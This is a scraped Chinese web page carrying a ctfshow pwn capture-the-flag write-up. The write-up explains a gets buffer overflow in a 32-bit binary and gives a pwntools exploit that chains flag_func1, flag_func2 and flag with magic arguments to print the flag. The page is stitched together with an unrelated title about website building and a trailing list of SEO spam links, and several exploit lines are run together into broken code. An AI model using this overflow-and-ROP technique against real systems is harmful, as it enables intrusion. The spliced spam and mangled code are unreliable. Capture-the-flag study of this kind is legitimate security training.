当前位置: 首页 > news >正文

网站开辟两学一做专栏做网站的公司怎么找

网站开辟两学一做专栏,做网站的公司怎么找,适合个人做的网站,网站做违法的事情投诉你是我的谁,我的我是你的谁 32 位程序,开启 NX 保护 看主函数 跟进 ctfshow 函数 gets 存在溢出 注意到有三个与 flag 相关的函数 先看 flag 函数 输出 flag 的条件: if ( flag1 && flag2 && a1 0xBDBDBDBD ) 看 flag_fu…

你是我的谁,我的我是你的谁

32 位程序,开启 NX 保护

看主函数

跟进 ctfshow 函数

gets 存在溢出

注意到有三个与 flag 相关的函数

先看 flag 函数

输出 flag 的条件:

 if ( flag1 && flag2 && a1 == 0xBDBDBDBD )

看 flag_func1 函数

会直接将 flag1 置 1

看 flag_func2 函数

flag2 置 1 的条件

  if ( flag1 && a1 == 0xACACACAC )

那么思路就很清晰了,溢出后先跳到 flag_func1,将 flag1 置 1

再跳到 flag_func2,满足条件让 flag2 置 1

最后跳到 flag 函数,满足条件读取打印 flag

写 exp:

# @author:My6n
# @time:20250614
from pwn import *
context(arch = 'i386',os = 'linux',log_level = 'debug')
io = remote('pwn.challenge.ctf.show',28295)elf = ELF('./pwn')
flag_addr = elf.sym['flag']
flag1_addr = elf.sym['flag_func1']
flag2_addr = elf.sym['flag_func2']payload = cyclic(0x2c+4)
payload += p32(flag1_addr) 
payload += p32(flag2_addr) 
payload += p32(flag_addr)
payload += p32(0xACACACAC) + p32(0xBDBDBDBD)io.sendlineafter('Input your flag: ',payload)io.interactive()

没有问题

拿到 flag: ctfshow{e4a15f8b-48a0-46ce-9783-7fa48bef281a}

http://www.yayakq.cn/news/999864/

相关文章:

  • 网站 按钮 素材关于网站建设的报告
  • 零基础搭建网站查排名的网站
  • 烟台市牟平区建设局网站wordpress支持视频
  • 公司网站毕业设计论文医院管理系统网站模板
  • 国际设计师网站jsp网站 自动发送邮件
  • 建设一个网站可以采用哪几种方案干事儿网网站开发
  • 课件ppt模板免费下载网站网上做电商怎么做
  • 邹城市建设银行网站帝国cms 网站地图标签
  • 免费网站建设报价广告设计与制作主要学什么
  • 网站怎么做修改十大产品设计公司
  • 如何查看网站ftp地址中国建设银行邀约提额网站
  • 自学网站建设和seo北京网络营销
  • 揭阳建设局网站西宁市建设网站公司
  • 南昌企业网站设计建设制作城乡建设部网站
  • 南宁站建好就够用腾讯广告投放平台官网
  • 网站设计这个专业怎么样网站维护运营优化公司
  • 管理有限公司网站设计wordpress 插件 注入
  • 沈阳网站建设找世纪兴建筑网站建设案例
  • 公司制作一个网站要多少钱网站优怎么做
  • 网站建设与管理 pdf网站开发工程师社交
  • 做网站和做app有什么不同网站开发用工工程师
  • dw做网站怎么替换字体中国营销传播网官网
  • 怎么做网站的百度收录wordpress 首页轮播
  • 怎么做淘宝客网站页面搜网站旧域名
  • 关于校园图书馆网站建设购物网站开发需要什么软件
  • 网站建设推广者怎样找到客户2021年最为成功的营销案例
  • 网站开发设计实训实训总结企业网站建设试题
  • 怎么建设大淘客网站企业进行网站建设的方式
  • 备案域名绑定网站网站开发的背景和意义
  • 京东网站建设的目标wordpress时间调用